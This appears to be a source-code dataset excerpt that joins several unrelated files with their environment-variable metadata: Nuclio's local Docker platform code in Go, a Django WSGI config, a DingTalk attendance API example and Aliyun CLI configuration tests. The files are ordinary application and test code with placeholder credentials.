reportCreationError(buildErr) // nolint: errcheck
return nil, buildErr
}
createFunctionResult, deployErr := p.deployFunction(createFunctionOptions, previousHTTPPort)
if deployErr != nil {
reportCreationError(deployErr) // nolint: errcheck
return nil, deployErr
}
// update the function
if err = p.localStore.createOrUpdateFunction(&functionconfig.ConfigWithStatus{
Config: createFunctionOptions.FunctionConfig,
Status: functionconfig.Status{
HTTPPort: createFunctionResult.Port,
State: functionconfig.FunctionStateReady,
},
}); err != nil {
return nil, errors.Wrap(err, "Failed to update function with state")
}
return createFunctionResult, nil
}
// If needed, load any docker image from archive into docker
if createFunctionOptions.InputImageFile != "" {
p.Logger.InfoWith("Loading docker image from archive", "input", createFunctionOptions.InputImageFile)
err := p.dockerClient.Load(createFunctionOptions.InputImageFile)
if err != nil {
return nil, errors.Wrap(err, "Failed to load docker image from archive")
}
}
// wrap the deployer's deploy with the base HandleDeployFunction to provide lots of
// common functionality
return p.HandleDeployFunction(existingFunctionConfig, createFunctionOptions, onAfterConfigUpdated, onAfterBuild)
}
// GetFunctions will return deployed functions
func (p *Platform) GetFunctions(getFunctionsOptions *platform.GetFunctionsOptions) ([]platform.Function, error) {
var functions []platform.Function
// get project filter
projectName := common.StringToStringMap(getFunctionsOptions.Labels, "=")["nuclio.io/project-name"]
// get all the functions in the store. these functions represent both functions that are deployed
// and functions that failed to build
localStoreFunctions, err := p.localStore.getFunctions(&functionconfig.Meta{
Name: getFunctionsOptions.Name,
Namespace: getFunctionsOptions.Namespace,
})
if err != nil {
return nil, errors.Wrap(err, "Failed to read functions from local store")
}
// return a map of functions by name
for _, localStoreFunction := range localStoreFunctions {
// filter by project name
if projectName != "" && localStoreFunction.GetConfig().Meta.Labels["nuclio.io/project-name"] != projectName {
continue
}
// enrich with build logs
if deployLogStream, exists := p.DeployLogStreams[localStoreFunction.GetConfig().Meta.GetUniqueID()]; exists {
deployLogStream.ReadLogs(nil, &localStoreFunction.GetStatus().Logs)
}
functions = append(functions, localStoreFunction)
}
return functions, nil
}
// UpdateFunction will update a previously deployed function
func (p *Platform) UpdateFunction(updateFunctionOptions *platform.UpdateFunctionOptions) error {
return nil
}
// DeleteFunction will delete a previously deployed function
func (p *Platform) DeleteFunction(deleteFunctionOptions *platform.DeleteFunctionOptions) error {
// delete the function from the local store
err := p.localStore.deleteFunction(&deleteFunctionOptions.FunctionConfig.Meta)
if err != nil {
// propagate not found errors
if err == nuclio.ErrNotFound {
return err
}
p.Logger.WarnWith("Failed to delete function from local store", "err", err.Error())
}
getFunctionEventsOptions := &platform.FunctionEventMeta{
Labels: map[string]string{
"nuclio.io/function-name": deleteFunctionOptions.FunctionConfig.Meta.Name,
},
Namespace: deleteFunctionOptions.FunctionConfig.Meta.Namespace,
}
functionEvents, err := p.localStore.getFunctionEvents(getFunctionEventsOptions)
if err != nil {
return errors.Wrap(err, "Failed to get function events")
}
p.Logger.InfoWith("Got function events", "num", len(functionEvents))
errGroup, _ := errgroup.WithContext(context.TODO())
for _, functionEvent := range functionEvents {
functionEvent := functionEvent // capture the range variable for the goroutine below
errGroup.Go(func() error {
if err := p.localStore.deleteFunctionEvent(&functionEvent.GetConfig().Meta); err != nil {
return errors.Wrap(err, "Failed to delete function event")
}
return nil
})
}
// wait for all errgroup goroutines
if err := errGroup.Wait(); err != nil {
return errors.Wrap(err, "Failed to delete function events")
}
getContainerOptions := &dockerclient.GetContainerOptions{
Labels: map[string]string{
"nuclio.io/platform": "local",
"nuclio.io/namespace": deleteFunctionOptions.FunctionConfig.Meta.Namespace,
"nuclio.io/function-name": deleteFunctionOptions.FunctionConfig.Meta.Name,
},
}
containersInfo, err := p.dockerClient.GetContainers(getContainerOptions)
if err != nil {
return errors.Wrap(err, "Failed to get containers")
}
if len(containersInfo) == 0 {
return nil
}
// iterate over containers and delete them. It's possible that under some weird circumstances
// there are a few instances of this function in the namespace
for _, containerInfo := range containersInfo {
if err := p.dockerClient.RemoveContainer(containerInfo.ID); err != nil {
return err
}
}
p.Logger.InfoWith("Function deleted", "name", deleteFunctionOptions.FunctionConfig.Meta.Name)
return nil
}
// GetHealthCheckMode returns the healthcheck mode the platform requires
func (p *Platform) GetHealthCheckMode() platform.HealthCheckMode {
// The internal client needs to perform the health check
return platform.HealthCheckModeInternalClient
}
// GetName returns the platform name
func (p *Platform) GetName() string {
return "local"
}
func (p *Platform) GetNodes() ([]platform.Node, error) {
// just create a single node
return []platform.Node{&node{}}, nil
}
// CreateProject will create a new project
func (p *Platform) CreateProject(createProjectOptions *platform.CreateProjectOptions) error {
return p.localStore.createOrUpdateProject(&createProjectOptions.ProjectConfig)
}
// UpdateProject will update an existing project
func (p *Platform) UpdateProject(updateProjectOptions *platform.UpdateProjectOptions) error {
return p.localStore.createOrUpdateProject(&updateProjectOptions.ProjectConfig)
}
// DeleteProject will delete an existing project
func (p *Platform) DeleteProject(deleteProjectOptions *platform.DeleteProjectOptions) error {
if err := p.Platform.ValidateDeleteProjectOptions(deleteProjectOptions); err != nil {
return errors.Wrap(err, "Delete project options validation failed")
}
return p.localStore.deleteProject(&deleteProjectOptions.Meta)
}
// GetProjects will list existing projects
func (p *Platform) GetProjects(getProjectsOptions *platform.GetProjectsOptions) ([]platform.Project, error) {
return p.localStore.getProjects(&getProjectsOptions.Meta)
}
// CreateFunctionEvent will create a new function event that can later be used as a template from
// which to invoke functions
func (p *Platform) CreateFunctionEvent(createFunctionEventOptions *platform.CreateFunctionEventOptions) error {
return p.localStore.createOrUpdateFunctionEvent(&createFunctionEventOptions.FunctionEventConfig)
}
// UpdateFunctionEvent will update a previously existing function event
func (p *Platform) UpdateFunctionEvent(updateFunctionEventOptions *platform.UpdateFunctionEventOptions) error {
return p.localStore.createOrUpdateFunctionEvent(&updateFunctionEventOptions.FunctionEventConfig)
}
// DeleteFunctionEvent will delete a previously existing function event
func (p *Platform) DeleteFunctionEvent(deleteFunctionEventOptions *platform.DeleteFunctionEventOptions) error {
return p.localStore.deleteFunctionEvent(&deleteFunctionEventOptions.Meta)
}
// GetFunctionEvents will list existing function events
func (p *Platform) GetFunctionEvents(getFunctionEventsOptions *platform.GetFunctionEventsOptions) ([]platform.FunctionEvent, error) {
return p.localStore.getFunctionEvents(&getFunctionEventsOptions.Meta)
}
// GetExternalIPAddresses returns the external IP addresses invocations will use, if "via" is set to "external-ip".
// These addresses are either set through SetExternalIPAddresses or automatically discovered
func (p *Platform) GetExternalIPAddresses() ([]string, error) {
// check if parent has addresses
externalIPAddress, err := p.Platform.GetExternalIPAddresses()
if err != nil {
return nil, errors.Wrap(err, "Failed to get external IP addresses from parent")
}
// if the parent has something, use that
if len(externalIPAddress) != 0 {
return externalIPAddress, nil
}
// If the testing environment variable is set - use that
if os.Getenv("NUCLIO_TEST_HOST") != "" {
return []string{os.Getenv("NUCLIO_TEST_HOST")}, nil
}
if common.RunningInContainer() {
return []string{"172.17.0.1"}, nil
}
// return an empty string to maintain backwards compatibility
return []string{""}, nil
}
// ResolveDefaultNamespace returns the proper default resource namespace, given the current default namespace
func (p *Platform) ResolveDefaultNamespace(defaultNamespace string) string {
// if no default namespace is chosen, use "nuclio"
if defaultNamespace == "@nuclio.selfNamespace" || defaultNamespace == "" {
return "nuclio"
}
return defaultNamespace
}
// GetNamespaces returns all the namespaces in the platform
func (p *Platform) GetNamespaces() ([]string, error) {
return []string{"nuclio"}, nil
}
func (p *Platform) GetDefaultInvokeIPAddresses() ([]string, error) {
return []string{"172.17.0.1"}, nil
}
func (p *Platform) getFreeLocalPort() (int, error) {
addr, err := net.ResolveTCPAddr("tcp", "127.0.0.1:0")
if err != nil {
return 0, err
}
l, err := net.ListenTCP("tcp", addr)
if err != nil {
return 0, err
}
defer l.Close() // nolint: errcheck
return l.Addr().(*net.TCPAddr).Port, nil
}
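// A minimal sketch of how getFreeLocalPort is consumed (hypothetical caller):
// the port is only reserved while the listener is open, so there is a small race
// window between Close() and docker binding the port in deployFunction.
//
//	port, err := p.getFreeLocalPort()
//	if err != nil {
//		return 0, errors.Wrap(err, "Failed to get free local port")
//	}
//	// use port as the host side of the container's 8080 port mapping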
func (p *Platform) deployFunction(createFunctionOptions *platform.CreateFunctionOptions,
previousHTTPPort int) (*platform.CreateFunctionResult, error) {
// get function platform specific configuration
functionPlatformConfiguration, err := newFunctionPlatformConfiguration(&createFunctionOptions.FunctionConfig)
if err != nil {
return nil, errors.Wrap(err, "Failed to create function platform configuration")
}
// get function port - either from configuration, from the previous deployment or from a free port
functionHTTPPort, err := p.getFunctionHTTPPort(createFunctionOptions, previousHTTPPort)
if err != nil {
return nil, errors.Wrap(err, "Failed to get function HTTP port")
}
createFunctionOptions.Logger.DebugWith("Function port allocated",
"port", functionHTTPPort,
"previousHTTPPort", previousHTTPPort)
labels := map[string]string{
"nuclio.io/platform": "local",
"nuclio.io/namespace": createFunctionOptions.FunctionConfig.Meta.Namespace,
"nuclio.io/function-name": createFunctionOptions.FunctionConfig.Meta.Name,
"nuclio.io/function-spec": p.encodeFunctionSpec(&createFunctionOptions.FunctionConfig.Spec),
}
for labelName, labelValue := range createFunctionOptions.FunctionConfig.Meta.Labels {
labels[labelName] = labelValue
}
marshalledAnnotations := p.marshallAnnotations(createFunctionOptions.FunctionConfig.Meta.Annotations)
if marshalledAnnotations != nil {
labels["nuclio.io/annotations"] = string(marshalledAnnotations)
}
// create processor configuration at a temporary location unless user specified a configuration
localProcessorConfigPath, err := p.createProcessorConfig(createFunctionOptions)
if err != nil {
return nil, errors.Wrap(err, "Failed to create processor configuration")
}
// create volumes string[string] map for volumes
volumesMap := map[string]string{
localProcessorConfigPath: path.Join("/", "etc", "nuclio", "config", "processor", "processor.yaml"),
}
for _, volume := range createFunctionOptions.FunctionConfig.Spec.Volumes {
// only add hostpath volumes
if volume.Volume.HostPath != nil {
volumesMap[volume.Volume.HostPath.Path] = volume.VolumeMount.MountPath
}
}
envMap := map[string]string{}
for _, env := range createFunctionOptions.FunctionConfig.Spec.Env {
envMap[env.Name] = env.Value
}
// run the docker image
containerID, err := p.dockerClient.RunContainer(createFunctionOptions.FunctionConfig.Spec.Image, &dockerclient.RunOptions{
ContainerName: p.getContainerNameByCreateFunctionOptions(createFunctionOptions),
Ports: map[int]int{functionHTTPPort: 8080},
Env: envMap,
Labels: labels,
Volumes: volumesMap,
Network: functionPlatformConfiguration.Network,
})
if err != nil {
return nil, errors.Wrap(err, "Failed to run docker container")
}
p.Logger.InfoWith("Waiting for function to be ready", "timeout", createFunctionOptions.FunctionConfig.Spec.ReadinessTimeoutSeconds)
var readinessTimeout time.Duration
if createFunctionOptions.FunctionConfig.Spec.ReadinessTimeoutSeconds != 0 {
readinessTimeout = time.Duration(createFunctionOptions.FunctionConfig.Spec.ReadinessTimeoutSeconds) * time.Second
} else {
readinessTimeout = 60 * time.Second
}
if err = p.dockerClient.AwaitContainerHealth(containerID, &readinessTimeout); err != nil {
var errMessage string
// try to get error logs
containerLogs, getContainerLogsErr := p.dockerClient.GetContainerLogs(containerID)
if getContainerLogsErr == nil {
errMessage = fmt.Sprintf("Function wasn't ready in time. Logs:\n%s", containerLogs)
} else {
errMessage = fmt.Sprintf("Function wasn't ready in time (couldn't fetch logs: %s)", getContainerLogsErr.Error())
}
return nil, errors.Wrap(err, errMessage)
}
return &platform.CreateFunctionResult{
CreateFunctionBuildResult: platform.CreateFunctionBuildResult{
Image: createFunctionOptions.FunctionConfig.Spec.Image,
UpdatedFunctionConfig: createFunctionOptions.FunctionConfig,
},
Port: functionHTTPPort,
ContainerID: containerID,
}, nil
}
func (p *Platform) createProcessorConfig(createFunctionOptions *platform.CreateFunctionOptions) (string, error) {
configWriter, err := processorconfig.NewWriter()
if err != nil {
return "", errors.Wrap(err, "Failed to create processor configuration writer")
}
// must specify "/tmp" here so that it's available on docker for mac
processorConfigFile, err := ioutil.TempFile("/tmp", "processor-config-")
if err != nil {
return "", errors.Wrap(err, "Failed to create temporary processor config")
}
defer processorConfigFile.Close() // nolint: errcheck
if err = configWriter.Write(processorConfigFile, &processor.Configuration{
Config: createFunctionOptions.FunctionConfig,
}); err != nil {
return "", errors.Wrap(err, "Failed to write processor config")
}
p.Logger.DebugWith("Wrote processor configuration", "path", processorConfigFile.Name())
// read the file once for logging
processorConfigContents, err := ioutil.ReadFile(processorConfigFile.Name())
if err != nil {
return "", errors.Wrap(err, "Failed to read processor configuration file")
}
// log
p.Logger.DebugWith("Wrote processor configuration file", "contents", string(processorConfigContents))
return processorConfigFile.Name(), nil
}
func (p *Platform) encodeFunctionSpec(spec *functionconfig.Spec) string {
encodedFunctionSpec, _ := json.Marshal(spec)
return string(encodedFunctionSpec)
}
func (p *Platform) getFunctionHTTPPort(createFunctionOptions *platform.CreateFunctionOptions,
previousHTTPPort int) (int, error) {
// if the configuration specified an HTTP port - use that
if createFunctionOptions.FunctionConfig.Spec.GetHTTPPort() != 0 {
p.Logger.DebugWith("Configuration specified HTTP port",
"port",
createFunctionOptions.FunctionConfig.Spec.GetHTTPPort())
return createFunctionOptions.FunctionConfig.Spec.GetHTTPPort(), nil
}
// if there was a previous deployment and no configuration - use that
if previousHTTPPort != 0 {
return previousHTTPPort, nil
}
// get a free local port
freeLocalPort, err := p.getFreeLocalPort()
if err != nil {
return -1, errors.Wrap(err, "Failed to get free local port")
}
p.Logger.DebugWith("Found free local port", "port", freeLocalPort)
return freeLocalPort, nil
}
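// Port resolution above, summarized with illustrative values:
//   spec.GetHTTPPort() == 31000            -> 31000 (explicit configuration wins)
//   spec unset, previousHTTPPort == 32768  -> 32768 (reuse the previous deployment's port)
//   both unset                             -> a free ephemeral port from getFreeLocalPort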
func (p *Platform) getContainerNameByCreateFunctionOptions(createFunctionOptions *platform.CreateFunctionOptions) string {
return fmt.Sprintf("%s-%s",
createFunctionOptions.FunctionConfig.Meta.Namespace,
createFunctionOptions.FunctionConfig.Meta.Name)
}
func (p *Platform) getContainerHTTPTriggerPort(container *dockerclient.Container) int {
ports := container.HostConfig.PortBindings["8080/tcp"]
if len(ports) == 0 {
return 0
}
httpPort, _ := strconv.Atoi(ports[0].HostPort)
return httpPort
}
func (p *Platform) marshallAnnotations(annotations map[string]string) []byte {
if annotations == nil {
return nil
}
marshalledAnnotations, err := json.Marshal(annotations)
if err != nil {
return nil
}
// return the marshalled annotations as JSON bytes
return marshalledAnnotations
}
func (p *Platform) deletePreviousContainers(createFunctionOptions *platform.CreateFunctionOptions) (int, error) {
var previousHTTPPort int
createFunctionOptions.Logger.InfoWith("Cleaning up before deployment")
getContainerOptions := &dockerclient.GetContainerOptions{
Name: p.getContainerNameByCreateFunctionOptions(createFunctionOptions),
Stopped: true,
}
containers, err := p.dockerClient.GetContainers(getContainerOptions)
if err != nil {
return 0, errors.Wrap(err, "Failed to get function")
}
// if the function exists, delete it
if len(containers) > 0 {
createFunctionOptions.Logger.InfoWith("Function already exists, deleting")
// iterate over containers and delete
for _, container := range containers {
previousHTTPPort = p.getContainerHTTPTriggerPort(&container)
err = p.dockerClient.RemoveContainer(container.Name)
if err != nil {
return 0, errors.Wrap(err, "Failed to delete existing function")
}
}
}
return previousHTTPPort, nil
}
func (p *Platform) ValidateFunctionContainersHealthiness() {
namespaces, err := p.GetNamespaces()
if err != nil {
p.Logger.WarnWith("Cannot not get namespaces", "err", err)
return
}
var unhealthyFunctions []*functionconfig.Config
var functionsFailedToMarkUnhealthy []*functionconfig.Config
for _, namespace := range namespaces {
// get functions for that namespace
functions, err := p.GetFunctions(&platform.GetFunctionsOptions{
Namespace: namespace,
})
if err != nil {
p.Logger.WarnWith("Cannot get functions to validate",
"namespace", namespace,
"err", err)
continue
}
// For each function, we will check if its container is healthy
// in case it is not healthy (or container is missing), update function status
// and mark its state to error
for _, function := range functions {
functionConfig := function.GetConfig()
functionState := function.GetStatus().State
functionName := functionConfig.Meta.Name
if functionState != functionconfig.FunctionStateReady {
// Skipping checking of not-ready functions
continue
}
// get function container id
containerID := p.getContainerNameByCreateFunctionOptions(&platform.CreateFunctionOptions{
FunctionConfig: functionconfig.Config{
Meta: functionconfig.Meta{
Name: functionName,
Namespace: namespace,
},
},
})
if err := p.markFunctionUnhealthy(containerID, functionConfig); err != nil {
functionsFailedToMarkUnhealthy = append(functionsFailedToMarkUnhealthy, functionConfig)
} else {
unhealthyFunctions = append(unhealthyFunctions, functionConfig)
}
}
}
if len(unhealthyFunctions) > 0 {
p.Logger.InfoWith(fmt.Sprintf("Successfully marked %d functions as unhealthy",
len(unhealthyFunctions)),
"unhealthyFunctions", unhealthyFunctions)
}
if len(functionsFailedToMarkUnhealthy) > 0 {
p.Logger.WarnWith(fmt.Sprintf("Failed to mark %d functions as unhealthy",
len(functionsFailedToMarkUnhealthy)),
"functionsFailedToMarkUnhealthy", functionsFailedToMarkUnhealthy)
}
}
func (p *Platform) markFunctionUnhealthy(containerID string, functionConfig *functionconfig.Config) error {
if err := p.dockerClient.AwaitContainerHealth(containerID,
&p.functionContainersHealthinessTimeout); err != nil {
// function container is not healthy or missing, mark function state as error
return p.localStore.createOrUpdateFunction(&functionconfig.ConfigWithStatus{
Config: *functionConfig,
Status: functionconfig.Status{
State: functionconfig.FunctionStateError,
Message: "Container is not healthy",
},
})
}
return nil
}
|
[
"\"NUCLIO_TEST_HOST\"",
"\"NUCLIO_TEST_HOST\""
] |
[] |
[
"NUCLIO_TEST_HOST"
] |
[]
|
["NUCLIO_TEST_HOST"]
|
go
| 1 | 0 | |
config/wsgi.py
|
"""
WSGI config for Pathways project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
# This allows easy placement of apps within the interior
# main directory.
app_path = os.path.dirname(os.path.abspath(__file__)).replace('/config', '')
sys.path.append(os.path.join(app_path, 'main'))
if os.environ.get('DJANGO_SETTINGS_MODULE') == 'config.settings.production':
from raven.contrib.django.raven_compat.middleware.wsgi import Sentry
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
if os.environ.get('DJANGO_SETTINGS_MODULE') == 'config.settings.production':
application = Sentry(application)
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
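# A minimal, hypothetical middleware sketch (names are illustrative and not part
# of this project), showing what such a wrapper would look like:
#
# class HealthCheckMiddleware:
#     """Answer /healthz directly, before the request reaches Django."""
#     def __init__(self, app):
#         self.app = app
#     def __call__(self, environ, start_response):
#         if environ.get('PATH_INFO') == '/healthz':
#             start_response('200 OK', [('Content-Type', 'text/plain')])
#             return [b'ok']
#         return self.app(environ, start_response)
#
# application = HealthCheckMiddleware(application)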
|
[] |
[] |
[
"DJANGO_SETTINGS_MODULE"
] |
[]
|
["DJANGO_SETTINGS_MODULE"]
|
python
| 1 | 0 | |
examples/api_attendance_example.go
|
package main
import (
"fmt"
"github.com/ipandtcp/godingtalk"
"os"
"time"
)
func main() {
c := godingtalk.NewDingTalkClient(os.Getenv("corpid"), os.Getenv("corpsecret"))
err := c.RefreshAccessToken()
if err != nil {
panic(err)
}
dataFrom, _ := time.Parse("2006-01-02", "2018-03-06")
dataTo, _ := time.Parse("2006-01-02", "2018-03-10")
record, err := c.ListAttendanceRecord([]string{"085354234826136236"}, dataFrom, dataTo)
if err != nil {
panic(err)
} else if len(record.Records) > 0 {
fmt.Printf("%#v\n", record.Records[0])
}
result, err := c.ListAttendanceResult([]string{"085354234826136236"}, dataFrom, dataTo, 0, 2)
if err != nil {
panic(err)
} else if len(result.Records) > 0 {
fmt.Printf("%#v\n", result.Records[0])
}
}
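// To run this example, set the corpid and corpsecret environment variables to
// your DingTalk credentials (placeholder values shown):
//
//	corpid=xxxx corpsecret=yyyy go run api_attendance_example.go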
|
[
"\"corpid\"",
"\"corpsecret\""
] |
[] |
[
"corpid",
"corpsecret"
] |
[]
|
["corpid", "corpsecret"]
|
go
| 2 | 0 | |
currency/wsgi.py
|
"""
WSGI config for currency project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'currency.settings')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
config/configuration_test.go
|
// Copyright (c) 2009-present, Alibaba Cloud All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package config
import (
"bytes"
"encoding/json"
"errors"
"io"
"os"
"runtime"
"testing"
"github.com/aliyun/aliyun-cli/cli"
"github.com/stretchr/testify/assert"
)
func TestNewConfiguration(t *testing.T) {
excf := Configuration{
CurrentProfile: DefaultConfigProfileName,
Profiles: []Profile{
NewProfile(DefaultConfigProfileName),
},
}
cf := NewConfiguration()
assert.Equal(t, excf, cf)
}
func TestCFNewProfile(t *testing.T) {
cf := Configuration{
CurrentProfile: "",
}
assert.Len(t, cf.Profiles, 0)
p := cf.NewProfile("default")
assert.Len(t, cf.Profiles, 1)
exp := Profile{
Name: "default",
Mode: AK,
OutputFormat: "json",
Language: "en",
}
assert.Equal(t, exp, p)
}
func TestConfiguration(t *testing.T) {
cf := NewConfiguration()
//GetProfile
p, ok := cf.GetProfile("hh")
assert.False(t, ok)
assert.Equal(t, Profile{Name: "hh"}, p)
p, ok = cf.GetProfile("default")
assert.Equal(t, Profile{Name: "default", Mode: AK, OutputFormat: "json", Language: "en"}, p)
//PutProfile
assert.Len(t, cf.Profiles, 1)
cf.PutProfile(Profile{Name: "test", Mode: AK, OutputFormat: "json", Language: "en"})
assert.Len(t, cf.Profiles, 2)
assert.Equal(t, Profile{Name: "test", Mode: AK, OutputFormat: "json", Language: "en"}, cf.Profiles[1])
cf.PutProfile(Profile{Name: "test", Mode: StsToken, OutputFormat: "json", Language: "en"})
assert.Len(t, cf.Profiles, 2)
assert.Equal(t, Profile{Name: "test", Mode: StsToken, OutputFormat: "json", Language: "en"}, cf.Profiles[1])
//GetCurrentProfile
}
func TestLoadProfile(t *testing.T) {
originhook := hookLoadConfiguration
w := new(bytes.Buffer)
defer func() {
hookLoadConfiguration = originhook
}()
hookLoadConfiguration = func(fn func(path string, w io.Writer) (Configuration, error)) func(path string, w io.Writer) (Configuration, error) {
return func(path string, w io.Writer) (Configuration, error) {
return Configuration{CurrentProfile: "default", Profiles: []Profile{Profile{Name: "default", Mode: AK, AccessKeyId: "default_aliyun_access_key_id", AccessKeySecret: "default_aliyun_access_key_secret", OutputFormat: "json"}, Profile{Name: "aaa", Mode: AK, AccessKeyId: "sdf", AccessKeySecret: "ddf", OutputFormat: "json"}}}, nil
}
}
//testcase 1
p, err := LoadProfile(GetConfigPath()+"/"+configFile, w, "")
assert.Nil(t, err)
p.parent = nil
assert.Equal(t, Profile{Name: "default", Mode: AK, AccessKeyId: "default_aliyun_access_key_id", AccessKeySecret: "default_aliyun_access_key_secret", OutputFormat: "json"}, p)
//testcase 2
_, err = LoadProfile(GetConfigPath()+"/"+configFile, w, "hello")
assert.EqualError(t, err, "unknown profile hello, run configure to check")
//LoadCurrentProfile testcase
w.Reset()
p, err = LoadCurrentProfile(w)
assert.Nil(t, err)
p.parent = nil
assert.Equal(t, Profile{Name: "default", Mode: AK, AccessKeyId: "default_aliyun_access_key_id", AccessKeySecret: "default_aliyun_access_key_secret", OutputFormat: "json"}, p)
//testcase 3
hookLoadConfiguration = func(fn func(path string, w io.Writer) (Configuration, error)) func(path string, w io.Writer) (Configuration, error) {
return func(path string, w io.Writer) (Configuration, error) {
return Configuration{}, errors.New("error")
}
}
w.Reset()
p, err = LoadProfile(GetConfigPath()+"/"+configFile, w, "")
assert.Empty(t, p)
assert.EqualError(t, err, "init config failed error")
}
func TestHomePath(t *testing.T) {
if runtime.GOOS == "windows" {
assert.Equal(t, os.Getenv("USERPROFILE"), GetHomePath())
} else {
assert.Equal(t, os.Getenv("HOME"), GetHomePath())
}
}
func TestGetConfigPath(t *testing.T) {
orighookGetHomePath := hookGetHomePath
defer func() {
os.RemoveAll("./.aliyun")
hookGetHomePath = orighookGetHomePath
}()
hookGetHomePath = func(fn func() string) func() string {
return func() string {
return "."
}
}
assert.Equal(t, "./.aliyun", GetConfigPath())
}
func TestNewConfigFromBytes(t *testing.T) {
bytesConf := `{
"current": "",
"profiles": [
{
"name": "default",
"mode": "AK",
"access_key_id": "access_key_id",
"access_key_secret": "access_key_secret",
"sts_token": "",
"ram_role_name": "",
"ram_role_arn": "",
"ram_session_name": "",
"private_key": "",
"key_pair_name": "",
"expired_seconds": 0,
"verified": "",
"region_id": "cn-hangzhou",
"output_format": "json",
"language": "en",
"site": "",
"retry_timeout": 0,
"retry_count": 0
}
],
"meta_path": ""
}`
conf, err := NewConfigFromBytes([]byte(bytesConf))
assert.Nil(t, err)
assert.Equal(t, Configuration{Profiles: []Profile{Profile{Language: "en", Name: "default", Mode: "AK", AccessKeyId: "access_key_id", AccessKeySecret: "access_key_secret", RegionId: "cn-hangzhou", OutputFormat: "json"}}}, conf)
}
func TestSaveConfiguration(t *testing.T) {
orighookGetHomePath := hookGetHomePath
defer func() {
os.RemoveAll("./.aliyun")
hookGetHomePath = orighookGetHomePath
}()
hookGetHomePath = func(fn func() string) func() string {
return func() string {
return "."
}
}
conf := Configuration{Profiles: []Profile{Profile{Language: "en", Name: "default", Mode: "AK", AccessKeyId: "access_key_id", AccessKeySecret: "access_key_secret", RegionId: "cn-hangzhou", OutputFormat: "json"}}}
bytes, err := json.MarshalIndent(conf, "", "\t")
assert.Nil(t, err)
err = SaveConfiguration(conf)
assert.Nil(t, err)
file, err := os.Open(GetConfigPath() + "/" + configFile)
assert.Nil(t, err)
buf := make([]byte, 1024)
n, _ := file.Read(buf)
file.Close()
assert.Equal(t, string(bytes), string(buf[:n]))
}
func TestLoadConfiguration(t *testing.T) {
orighookGetHomePath := hookGetHomePath
defer func() {
os.RemoveAll("./.aliyun")
hookGetHomePath = orighookGetHomePath
}()
hookGetHomePath = func(fn func() string) func() string {
return func() string {
return "."
}
}
w := new(bytes.Buffer)
//testcase 1
cf, err := LoadConfiguration(GetConfigPath()+"/"+configFile, w)
assert.Nil(t, err)
assert.Equal(t, Configuration{CurrentProfile: "default", Profiles: []Profile{Profile{Name: "default", Mode: "AK", OutputFormat: "json", Language: "en"}}}, cf)
conf := Configuration{Profiles: []Profile{Profile{Language: "en", Name: "default", Mode: "AK", AccessKeyId: "access_key_id", AccessKeySecret: "access_key_secret", RegionId: "cn-hangzhou", OutputFormat: "json"}}}
err = SaveConfiguration(conf)
assert.Nil(t, err)
//testcase 2
w.Reset()
cf, err = LoadConfiguration(GetConfigPath()+"/"+configFile, w)
assert.Equal(t, Configuration{CurrentProfile: "", Profiles: []Profile{Profile{Name: "default", Mode: "AK", AccessKeyId: "access_key_id", AccessKeySecret: "access_key_secret", RegionId: "cn-hangzhou", OutputFormat: "json", Language: "en"}}}, cf)
assert.Nil(t, err)
}
func TestLoadProfileWithContext(t *testing.T) {
originhook := hookLoadConfiguration
defer func() {
hookLoadConfiguration = originhook
}()
hookLoadConfiguration = func(fn func(path string, w io.Writer) (Configuration, error)) func(path string, w io.Writer) (Configuration, error) {
return func(path string, w io.Writer) (Configuration, error) {
return Configuration{CurrentProfile: "default", Profiles: []Profile{Profile{Name: "default", Mode: AK, AccessKeyId: "default_aliyun_access_key_id", AccessKeySecret: "default_aliyun_access_key_secret", OutputFormat: "json"}, Profile{Name: "aaa", Mode: AK, AccessKeyId: "sdf", AccessKeySecret: "ddf", OutputFormat: "json"}}}, nil
}
}
w := new(bytes.Buffer)
ctx := cli.NewCommandContext(w)
AddFlags(ctx.Flags())
//testcase 1
_, err := LoadProfileWithContext(ctx)
assert.EqualError(t, err, "region can't be empty")
//testcase 2
ctx.Flags().Get("profile").SetAssigned(true)
_, err = LoadProfileWithContext(ctx)
assert.EqualError(t, err, "region can't be empty")
}
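// The tests above use a hook-override pattern: package-level hooks
// (hookLoadConfiguration, hookGetHomePath) are swapped for fakes and restored in
// a deferred call, so no real home directory or config file is touched.
// A minimal sketch of the same idea (hypothetical test body):
//
//	orig := hookGetHomePath
//	defer func() { hookGetHomePath = orig }()
//	hookGetHomePath = func(fn func() string) func() string {
//		return func() string { return t.TempDir() } // fake home directory
//	}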
|
[
"\"USERPROFILE\"",
"\"HOME\""
] |
[] |
[
"HOME",
"USERPROFILE"
] |
[]
|
["HOME", "USERPROFILE"]
|
go
| 2 | 0 | |
providers/datadog/datadog_provider.go
|
// Copyright 2018 The Terraformer Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
